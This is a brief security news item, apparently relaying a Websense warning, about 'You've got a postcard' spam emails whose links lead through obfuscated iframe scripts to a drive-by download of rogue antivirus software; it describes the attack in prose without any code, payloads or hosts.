“You’ve got a postcard” spam emails lead to fake AV

Easter has come and passed, but the threat of bogus e-cards is alive as it ever was.

This particular method of luring users to malicious pages or to download malicious attachments has been around for ages, and the fact that it is still used proves that it is effective enough for spammers to bother with it.

Websense warns about pretty generic spam emails bearing the “You’ve got a postcard” subject and urging the recipient to follow the offered link in order to view it “at anytime within the next 20 days.”

“The URLs used in the emails are either compromised sites or were only created barely two weeks ago,” they say. Clicking on the link takes the user to a site containing obfuscated code that creates an iframe containing another URL.

This second URL contains an obfuscated script that drops some exploit code in order to run a rogue AV on the victim’s machine.

The biggest danger here is the fact that the recipient doesn’t have to do anything other than follow the offered link in order for his computer to get compromised – he doesn’t have to confirm the download of an executable camouflaged as an innocuous file or anything else.